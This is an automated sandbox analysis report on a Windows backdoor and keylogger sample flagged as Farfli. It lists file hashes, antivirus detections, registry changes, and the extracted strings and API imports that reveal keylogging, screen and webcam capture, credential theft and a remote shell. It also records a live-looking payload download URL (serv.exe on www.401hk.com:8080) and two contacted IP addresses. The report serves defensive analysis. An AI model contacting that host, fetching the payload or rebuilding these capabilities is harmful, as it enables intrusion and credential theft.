Analysis Date: 2014-08-15 19:11:22
MD5: 0b88ec6eec7ae686a1e027fc93417d0a
SHA1: d1fb895153e948eca701a4855b9709aea533e14e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: 06655b24c8ee9c503248875747c215d5 sha1: 59f3b7509289c2e9daf7fe75038f38efa75b5c59 size: 176128
Section .rdata md5: 4a05fff5eab94f1475b30fba4f4ceb25 sha1: fd0baace43b4231712bf364cf038abbaa497d116 size: 16384
Section .data  md5: b29e787d6dab4fd75b325ffba6a34f64 sha1: 3badba97ea1ad53e9fb694bc202a0c94fec81ddc size: 12288
Section .rsrc  md5: 4072783b8efb99a9e5817067d68f61c6 sha1: 7cb41fea50720b48be0c145e1473982b23e9ab77 size: 12288
Timestamp: 2013-11-20 08:18:15
Packer: Microsoft Visual C++ v6.0
PEhash: 63a8fef9d46d038749fcd1d24fb70cf7fabdc2c4
IMPhash: f334a129cb0600a15d4c03c856cda98d
AV 360 Safe: Gen:Variant.Symmi.40534
AV Ad-Aware: Gen:Variant.Symmi.40534
AV Alwil (avast): Farfli-BD [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Heuristic-217!Eldorado
AV Avira (antivir): TR/Graftor.123644.13
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Backdoor.Farfli.BX4
AV ClamAV: no_virus
AV Dr. Web: Trojan.KeyLogger.22750
AV Emsisoft: Gen:Variant.Symmi.40534
AV Eset (nod32): Win32/Farfli.APS
AV Fortinet: W32/Vehidis.U!tr
AV Frisk (f-prot): W32/Heuristic-217!Eldorado (not disinfectable)
AV F-Secure: Gen:Variant.Symmi.40534
AV Grisoft (avg): BackDoor.Generic_r.EPC
AV Ikarus: Trojan-GameThief.Win32.Magania
AV K7: Trojan ( 0048bc811 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Trojan.Agent
AV Mcafee: no_virus
AV Microsoft Security Essentials: Backdoor:Win32/Farfli.BX
AV MicroWorld (escan): Gen:Variant.Symmi.40534
AV Norman: winpe/DLoader.ATLZA
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: Trojan.Gen
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus
AV Yara APT: no_virus
AV Zillya!: Trojan.Farfli.Win32.16366

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Winsock DNS: www.401hk.com
Winsock URL: http://www.401hk.com:8080/serv.exe

Network Details:

DNS: www.401hk.com (Type: A) ➝ 222.216.190.60
DNS: www.401hk.com (Type: A) ➝ 117.34.28.75
HTTP GET: http://www.401hk.com:8080/serv.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1033 ➝ 222.216.190.60:8080

Raw Pcap
0x00000000 (00000)   47455420 2f736572 762e6578 65204854   GET /serv.exe HT
0x00000010 (00016)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000020 (00032)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000030 (00048)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000040 (00064)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000050 (00080)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000060 (00096)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000070 (00112)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000080 (00128)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000090 (00144)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000a0 (00160)   73743a20 7777772e 34303168 6b2e636f   st: www.401hk.co
0x000000b0 (00176)   6d3a3830 38300d0a 436f6e6e 65637469   m:8080..Connecti
0x000000c0 (00192)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000d0 (00208)   0d0a                                  ..
Strings
kernel32.dll
LeaveCriticalSection
KERNEL32.dll
LeaveCriticalSection
KERNEL32.dll
KERNEL32.dll
GetWindowsDirectoryA
\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
Microsoft\Network\Connections\pbk\rasphone.pbk
Documents and Settings\
wsprintfA
USER32.dll
KERNEL32.dll
FreeLibrary
advapi32.dll
ConvertSidToStringSidA
RasDialParams!%s#0
L$_RasDefaultCredentials#0
LsaFreeMemory
ADVAPI32.dll
wsprintfA
USER32.dll
KERNEL32.dll
GetWindowsDirectoryA
\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
Microsoft\Network\Connections\pbk\rasphone.pbk
Documents and Settings\
wsprintfA
USER32.dll
KERNEL32.dll
GetPrivateProfileStringA
KERNEL32.dll
DeleteFileA
lstrlenA
KERNEL32.dll
GetFileAttributesA
KERNEL32.dll
KERNEL32.dll
GetLastError
\
ADVAPI32.dll
RegOpenKeyExA
USER32.dll
wsprintfA
WinSta0\Default
KERNEL32.dll
CreateProcessA
gKERNEL32.dll
GetLogicalDriveStringsA
KERNEL32.dll
GetVolumeInformationA
KERNEL32.dll
lstrlenA
KERNEL32.dll
GetDiskFreeSpaceExA
KERNEL32.dll
lstrlenA
KERNEL32.dll
LocalAlloc
KERNEL32.dll
LocalReAlloc
KERNEL32.dll
FindNextFileA
%s\*.*
USER32.dll
wsprintfA
KERNEL32.dll
FindFirstFileA
hh
FindClose
kernel32.dll
FindNextFileA
kernel32.dll
%s\*.*
USER32.dll
wsprintfA
KERNEL32.dll
FindFirstFileA
KERNEL32.dll
DeleteFileA
FindClose
kernel32.dll
KERNEL32.dll
lstrlenA
KERNEL32.dll
LocalAlloc
KERNEL32.dll
CreateFileA
KERNEL32.dll
GetFileSize
iLocalAlloc
KERNEL32.dll
CreateFileA
KERNEL32.dll
KERNEL32.dll
SetFilePointer
jKERNEL32.dll
ReadFile
KERNEL32.dll
lstrlenA
lstrlenA
KERNEL32.dll
FindNextFileA
wsprintfA
USER32.dll
USER32.dll
FindFirstFileA
KERNEL32.dll
FindClose
KERNEL32.dll
FindFirstFileA
FindClose
KERNEL32.dll
KERNEL32.dll
FindFirstFileA
pFindClose
KERNEL32.dll
KERNEL32.dll
CreateFileA
KERNEL32.dll
CreateFileA
KERNEL32.dll
SetFilePointer
plstrlenA
KERNEL32.dll
wsprintfA
USER32.dll
SYSTEM\CurrentControlSet\Services\
GetModuleFileNameA
CreateFileA
SetFilePointer
GetLastError
SYSTEM\CurrentControlSet\Services\
SYSTEM\CurrentControlSet\Services\
KERNEL32.dll
lstrlenA
CreateProcessA
KERNEL32.dll
WinSta0
KERNEL32.dll
CreateProcessA
WinSta0
DJX UP
CreateProcessA
lstrcpyA
lstrlenA
KERNEL32.dll
KERNEL32.dll
KERNEL32.dll
aPPLICATIONS\IEXPLORE.EXE\SHELL\OPEN\COMMAND
WinSta0
KERNEL32.dll
lstrlenA
SYSTEM\CurrentControlSet\Services\BITS
SYSTEM\CurrentControlSet\Services\
-0KERNEL32.dll
LeaveCriticalSection
KERNEL32.dll
EnterCriticalSection
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
CreateThread
WS2_32.dll
recv
.
WS2_32.dll
recv
WS2_32.dll
recv
KERNEL32.dll
LeaveCriticalSection
KERNEL32.dll
EnterCriticalSection
KERNEL32.dll
CreateThread
KERNEL32.dll
WaitForSingleObject
[ZKERNEL32.dll
CreateThread
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
CreateThread
KERNEL32.dll
CloseHandle
KERNEL32.dll
InitializeCriticalSection
KERNEL32.dll
DeleteCriticalSection
WS2_32.dll
recv
select
KERNEL32.dll
KERNEL32.dll
TerminateThread
KERNEL32.dll
InterlockedExchange
KERNEL32.dll
USER32.dll
wsprintfA
GetWindowsDirectoryA
KERNEL32.dll
DeleteFileA
KERNEL32.dll
GetModuleFileNameA
KERNEL32.dll
lstrlenA
KERNEL32.dll
GetFileSize
\ourlog.dat
KERNEL32.dll
GetSystemDirectoryA
KERNEL32.dll
CreateFileA
KERNEL32.dll
SetFilePointer
lstrlenA
KERNEL32.dll
USER32.dll
wsprintfA
KERNEL32.dll
lstrlenA
\ourlog.dat
{
|\ourlog.dat
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
SetEvent
ADVAPI32.dll
RegOpenKeyExA
REG_SZ
%-24s %-15s %s 
n
ADVAPI32.dll
RegOpenKeyExA
USER32.dll
wsprintfA
ADVAPI32.dll
RegOpenKeyExA
USER32.dll
MapVirtualKeyA
USER32.dll
mouse_event
USER32.dll
keybd_event
GlobalLock
KERNEL32.dll
KERNEL32.dll
GlobalAlloc
KERNEL32.dll
GlobalUnlock
USER32.dll
GetClipboardData
KERNEL32.dll
GlobalUnlock
KERNEL32.dll
GlobalSize
KERNEL32.dll
GlobalLock
v
KERNEL32.dll
InterlockedExchange
KERNEL32.dll
CloseHandle
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
CloseHandle
KERNEL32.dll
WaitForSingleObject
USER32.dll
BlockInput
KERNEL32.dll
VirtualAlloc
sKERNEL32.dll
VirtualFree
tuKERNEL32.dll
Sleep
USER32.dll
BlockInput
USER32.dll
SendMessageA
USER32.dll
SystemParametersInfoA
DestroyCursor
KERNEL32.dll
InterlockedExchange
USER32.dll
GetDC
KERNEL32.dll
InterlockedExchange
USER32.dll
GetDesktopWindow
USER32.dll
GetDC
KERNEL32.dll
Sleep
KERNEL32.dll
GetTickCount
USER32.dll
GetDesktopWindow
USER32.dll
GetDC
CreateCompatibleDC
KERNEL32.dll
Sleep
KERNEL32.dll
GetTickCount
KERNEL32.dll
InterlockedExchange
GetCursorInfo
DestroyCursor
KERNEL32.dll
CreatePipe
KERNEL32.dll
GetStartupInfoA
KERNEL32.dll
GetSystemDirectoryA
\cmd.exe
KERNEL32.dll
CreateProcessA
.KERNEL32.dll
TerminateThread
TerminateProcess
KERNEL32.dll
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
DisconnectNamedPipe
KERNEL32.dll
LocalAlloc
KERNEL32.dll
Sleep
KERNEL32.dll
PeekNamedPipe
KERNEL32.dll
ReadFile
KERNEL32.dll
TerminateThread
KERNEL32.dll
TerminateProcess
KERNEL32.dll
WaitForMultipleObjects
CloseHandle
KERNEL32.dll
GetLastError
Kernel32.dll
WTSGetActiveConsoleSessionId
KERNEL32.dll
lstrlenA
KERNEL32.dll
lstrlenA
WININET.dll
InternetCloseHandle
InternetOpenA
InternetReadFile
InternetOpenUrlA
Mozilla/4.0 (compatible)
HARDWARE\DESCRIPTION\System\CentralProcessor\0
AVICAP32.dll
capGetDriverDescriptionA
KERNEL32.dll
lstrcpyA
lstrlenA
KERNEL32.dll
USER32.dll
wsprintfA
f
KERNEL32.dll
GetSystemInfo
SYSTEM\CurrentControlSet\Services\BITS
KERNEL32.dll
ReleaseMutex
GetProcessWindowStation
USER32.dll
WaitForSingleObject
GetLastError
OpenEventA
SetErrorMode
CreateMutexA
USER32.dll
OpenWindowStationA
SetProcessWindowStation
USER32.dll
GetTickCount
KERNEL32.dll
http://www.401hk.com:8080/serv.exe
KERNEL32.dll
killmdx
\\.\killmdx
CreateThread
OutputDebugStringA
KERNEL32.dll
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
LocalSize
KERNEL32.dll
LocalSize
lstrlenA
KERNEL32.dll
KERNEL32.dll
LocalAlloc
KERNEL32.dll
LocalSize
.KERNEL32.dll
Sleep
KERNEL32.dll
TerminateProcess
KERNEL32.dll
OpenProcess
KERNEL32.dll
LocalAlloc
lstrlenA
KERNEL32.dll
KERNEL32.dll
LocalReAlloc
KERNEL32.dll
LocalSize
KERNEL32.dll
CreateToolhelp32Snapshot
KERNEL32.dll
Process32Next
}KERNEL32.dll
Process32First
KERNEL32.dll
OpenProcess
PSAPI.DLL
GetModuleFileNameExA
KERNEL32.dll
GetCurrentProcess
KERNEL32.dll
GetLastError
USER32.dll
ExitWindowsEx
KERNEL32.dll
LocalAlloc
lstrlenA
KERNEL32.dll
KERNEL32.dll
LocalReAlloc
KERNEL32.dll
LocalSize
USER32.dll
GetWindowThreadProcessId
USER32.dll
EnumWindows
~KERNEL32.dll
Process32First
KERNEL32.dll
CreateToolhelp32Snapshot
KERNEL32.dll
GetLastError
KERNEL32.dll
Process32Next
KERNEL32.dll
SetEvent
KERNEL32.dll
WaitForSingleObject
CreateEventA
KERNEL32.dll
CloseHandle
KERNEL32.dll
KERNEL32.dll
Process32Next
KERNEL32.dll
CreateToolhelp32Snapshot
KERNEL32.dll
Process32First
KERNEL32.dll
lstrcmpiA
KERNEL32.dll
lstrcmpiA
WTSAPI32.dll
WTSAPI32.dll
WTSFreeMemory
WTSQuerySessionInformationA
explorer.exe
KERNEL32.dll
OpenProcess
USER32.dll
GetUserObjectInformationA
GetThreadDesktop
USER32.dll
KERNEL32.dll
GetCurrentThreadId
USER32.dll
OpenInputDesktop
KERNEL32.dll
lstrcmpiA
USER32.dll
SetThreadDesktop
GetThreadDesktop
USER32.dll
GetCurrentThreadId
KERNEL32.dll
USER32.dll
GetUserObjectInformationA
USER32.dll
SetThreadDesktop
USER32.dll
OpenInputDesktop
USER32.dll
GetThreadDesktop
KERNEL32.dll
GetCurrentThreadId
Winlogon
lstrlenA
KERNEL32.dll
WININET.dll
InternetCloseHandle
InternetOpenA
InternetReadFile
InternetOpenUrlA
mozi
lla/4.0 (compatible)
KERNEL32.dll
CreateFileA
KERNEL32.dll
CreateEventA
avicap32.dll
capCreateCaptureWindowA
#32770
CVideoCap
KERNEL32.dll
SetEvent
avicap32.dll
capGetDriverDescriptionA
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
InterlockedExchange
WaitForSingleObject
KERNEL32.dll
InterlockedExchange
wxKERNEL32.dll
InterlockedExchange
KERNEL32.dll
WaitForSingleObject
KERNEL32.dll
GetTickCount
KERNEL32.dll
Sleep
ICSeqCompressFrame
ICOpen
ICSendMessage
ICSeqCompressFrameStart
ICCompressorFree
ICClose
.
jjjj
jjjjjjjjh
								
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ
??1type_info@@UAE@XZ
??2@YAPAXI@Z
??3@YAXPAX@Z
{4_^]3
~(9~$u
A<;B(}
A@;B,}
_acmdln
AddAccessAllowedAce
_adjust_fdiv
AdjustTokenPrivileges
advapi32.dll
ADVAPI32.dll
AllocateAndInitializeSid
Backspace
bad Allocate
bad buffer
_beginthreadex
BitBlt
calloc
CancelIo
CharNextA
CloseClipboard
CloseDesktop
CloseHandle
CloseServiceHandle
CloseWindow
_controlfp
ControlService
CreateCompatibleBitmap
CreateDIBSection
CreateDirectoryA
CreateEnvironmentBlock
CreateEventA
CreateFileA
CreateProcessAsUserA
CreateRemoteThread
CreateWindowExA
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ
__CxxFrameHandler
_CxxThrowException
D$0Qh,
D$(8D*
@.data
DefineDosDeviceA
 deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly 
Delete
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
DeleteService
Device
DialParamsUID
DownArrow
;D$<s!
D$$SUV
DuplicateTokenEx
EmptyClipboard
EnterCriticalSection
EnumProcessModules
_errno
_except_handler3
Execute
ExitProcess
Fdf+Fh
fdRead
FreeLibrary
FreeSid
FuKKi\Default
Game Over
GDI32.dll
GetAsyncKeyState
GetCurrentProcess
GetCursorPos
GetDIBits
GetDriveTypeA
GetFileSize
GetForegroundWindow
GetKeyState
GetLengthSid
GetLocalTime
__getmainargs
GetModuleFileNameA
GetModuleHandleA
GetNamedSecurityInfoA
GetPrivateProfileSectionNamesA
GetProcAddress
GetProcessHeap
GetStartupInfoA
GetSystemDirectoryA
GetSystemMetrics
GetTokenInformation
GetVersionExA
GetWindowTextA
GetWindowThreadProcessId
GlobalFree
<H1>403 Forbidden</H1>
HeapAlloc
HeapFree
HMLWQTn\Default
|$HPWS
HTTP://
HTTP/1.0 555 OK
Http/1.1 405 Forbidden
ICSendMessage
ICSeqCompressFrameEnd
 inflate 1.1.4 Copyright 1995-2002 Mark Adler 
InitializeAcl
InitializeCriticalSection
InitializeSecurityDescriptor
_initterm
Insert
InterlockedExchange
IsValidSid
IsWindow
IsWindowVisible
KERNEL32
kernel32.dll
KERNEL32.dll
LeaveCriticalSection
LeftArrow
L$LQVS
LoadCursorA
LoadLibraryA
LocalAlloc
LocalFree
LookupAccountNameA
LookupAccountSidA
LookupPrivilegeValueA
L$,QWV
L$ RUPj
LsaClose
LsaOpenPolicy
LsaRetrievePrivateData
lstrcatA
lstrcmpA
lstrcpyA
lstrlenA
malloc
memcpy
memmove
memset
MoveFileExA
MSVCP60.dll
MSVCRT.dll
MSVFW32.dll
MultiByteToWideChar
Num Lock
OpenClipboard
OpenDesktopA
OpenEventA
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenServiceA
PageDown
PageUp
__p__commode
__p__fmode
PhoneNumber
PostMessageA
PSAPI.DLL
QueryServiceStatus
`.rdata
ReadFile
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueA
RegQueryValueExA
RegSetKeySecurity
RegSetValueExA
ReleaseDC
RemoveDirectoryA
rename
ResetEvent
Rhvidc
RightArrow
Scroll
%s:\Documents and Settings\Local User
SeDebugPrivilege
select
Select
SelectObject
SendMessageA
__set_app_type
SetCapture
SetClipboardData
SetCursorPos
SetEntriesInAclA
SetEvent
SetFileAttributesA
SetLastError
SetNamedSecurityInfoA
SetRect
SetSecurityDescriptorDacl
SetTokenInformation
__setusermatherr
SHDeleteKeyA
SHELL32.dll
ShellExecuteA
SHGetFileInfoA
SHGetSpecialFolderPathA
shlwapi.dll
SHLWAPI.dll
Snapshot
%s%s*.*
%s\SHELL\OPEN\COMMAND
%s%s%s
StartServiceA
strcat
strchr
strcmp
strcpy
strlen
strncat
strncmp
_strnicmp
strrchr
strstr
strtok
_strupr
SVWht*C
T+3x%A
T$DPVS
t$h78B
t$hC8B
!This program cannot be run in DOS mode.
T$LPQR
T$LRWS
T$,PQh8
T$(PQR
T$,RWV
tZ9H tU9H$tP
UpArrow
URLDownloadToFileA
urlmon.dll
USER32.dll
USERENV.dll
VirtualAlloc
VirtualAllocEx
VirtualFree
W(9W$u
WaitForSingleObject
WideCharToMultiByte
WindowFromPoint
WriteFile
WriteProcessMemory
WS2_32.dll
WSAIoctl
wsprintfA
WTSAPI32.dll
WTSFreeMemory
WTSQuerySessionInformationA
WTSQueryUserToken
|$ WUSV
_XcptFilter